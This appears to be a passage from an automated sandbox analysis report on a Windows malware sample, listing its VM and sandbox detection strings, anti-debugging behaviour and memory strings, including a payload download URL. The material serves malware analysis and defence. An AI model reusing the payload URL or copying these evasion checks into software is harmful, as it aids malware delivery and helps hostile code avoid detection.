        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://ATSEASONALS.COM/GHRTT/BIN_KBJOEPXZ175.BIN
        Source: c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXET
        Source: Zr26f1rL6r.exe, 00000002.00000002.47311303704.000000000060D000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
        Source: C:\Windows\explorer.exe TID: 7852Thread sleep time: -165000s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0232045A rdtsc 2_2_0232045A
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeAPI coverage: 1.1 %
        Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.8 %
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeAPI coverage: 1.0 %
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeAPI coverage: 1.0 %
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeAPI coverage: 1.0 %
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040FA90 FindFirstFileW,FindNextFileW,FindClose,15_2_0040FA90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040FA89 FindFirstFileW,FindNextFileW,FindClose,15_2_0040FA89
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeSystem information queried: ModuleInformationJump to behavior
        Source: Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW8
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: rundll32.exe, 0000000F.00000002.51919706063.00000000005EB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW[0
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: c8ahotgz8h.exe, 0000001C.00000003.51529209702.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527691792.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51536267379.0000000000905000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWDmB
        Source: Zr26f1rL6r.exe, 0000000A.00000003.47934144925.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749514601.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47939814865.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47750467223.0000000000888000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48060566667.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp, rundll32.exe, 0000000F.00000002.51919706063.00000000005EB000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51529209702.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527691792.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51536267379.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662983793.000000000097E000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655599394.000000000097E000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735327927.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741391174.00000000007E5000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51734441811.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51742109864.0000000000853000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: c8ahotgz8h.exe, 0000001D.00000002.51662442297.0000000000914000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW(
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin
        Source: c8ahotgz8h.exe, 0000001C.00000002.51535505064.0000000000884000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: Zr26f1rL6r.exe, 00000002.00000002.47311303704.000000000060D000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: firefox.exe, 00000019.00000002.50723124652.000001BF40270000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
        Source: c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exet
        Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
        Source: c8ahotgz8h.exe, 0000001E.00000003.51735327927.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51734441811.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51742109864.0000000000853000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW\
        Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW(9_%SystemRoot%\system32\mswsock.dll
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: vmicvss
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: explorer.exe, 0000000E.00000000.47877168581.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47779130675.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48061967346.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47825346643.000000000D21C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
        Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0232045A rdtsc 2_2_0232045A
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231F3CA mov eax, dword ptr fs:[00000030h]2_2_0231F3CA
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02321490 mov eax, dword ptr fs:[00000030h]2_2_02321490
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231FCC1 mov eax, dword ptr fs:[00000030h]2_2_0231FCC1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAE89 mov eax, dword ptr fs:[00000030h]10_2_1E8EAE89
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EAE89 mov eax, dword ptr fs:[00000030h]10_2_1E8EAE89
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8EBE80 mov eax, dword ptr fs:[00000030h]10_2_1E8EBE80
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FCEA0 mov eax, dword ptr fs:[00000030h]10_2_1E8FCEA0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E980EAD mov eax, dword ptr fs:[00000030h]10_2_1E980EAD
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E980EAD mov eax, dword ptr fs:[00000030h]10_2_1E980EAD
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F2EB8 mov eax, dword ptr fs:[00000030h]10_2_1E8F2EB8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F2EB8 mov eax, dword ptr fs:[00000030h]10_2_1E8F2EB8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h]10_2_1E8D1EB2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E94CED0 mov ecx, dword ptr fs:[00000030h]10_2_1E94CED0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E901ED8 mov eax, dword ptr fs:[00000030h]10_2_1E901ED8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E989ED2 mov eax, dword ptr fs:[00000030h]10_2_1E989ED2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E947EC3 mov eax, dword ptr fs:[00000030h]10_2_1E947EC3
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E947EC3 mov ecx, dword ptr fs:[00000030h]10_2_1E947EC3
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994EC1 mov eax, dword ptr fs:[00000030h]10_2_1E994EC1
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8FBED0 mov eax, dword ptr fs:[00000030h]10_2_1E8FBED0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h]10_2_1E8F1EED
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h]10_2_1E8F1EED
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h]10_2_1E8F1EED
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]10_2_1E8C2EE8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]10_2_1E8C2EE8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]10_2_1E8C2EE8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h]10_2_1E8C2EE8
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E963EFC mov eax, dword ptr fs:[00000030h]10_2_1E963EFC
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3EE2 mov eax, dword ptr fs:[00000030h]10_2_1E8C3EE2
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E97EEE7 mov eax, dword ptr fs:[00000030h]10_2_1E97EEE7
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8BCEF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8BCEF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8BCEF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8BCEF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8BCEF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h]10_2_1E8BCEF0
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]10_2_1E93FE1F
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]10_2_1E93FE1F
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]10_2_1E93FE1F
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h]10_2_1E93FE1F
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]10_2_1E8C6E00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]10_2_1E8C6E00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]10_2_1E8C6E00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h]10_2_1E8C6E00
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3E01 mov eax, dword ptr fs:[00000030h]10_2_1E8C3E01
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8BBE18 mov ecx, dword ptr fs:[00000030h]10_2_1E8BBE18
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h]10_2_1E8C3E14
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h]10_2_1E8C3E14
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h]10_2_1E8C3E14
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8F8E15 mov eax, dword ptr fs:[00000030h]10_2_1E8F8E15
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E994E03 mov eax, dword ptr fs:[00000030h]10_2_1E994E03
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E956E30 mov eax, dword ptr fs:[00000030h]10_2_1E956E30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E956E30 mov eax, dword ptr fs:[00000030h]10_2_1E956E30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]10_2_1E955E30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E955E30 mov ecx, dword ptr fs:[00000030h]10_2_1E955E30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]10_2_1E955E30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]10_2_1E955E30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]10_2_1E955E30
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h]10_2_1E955E30
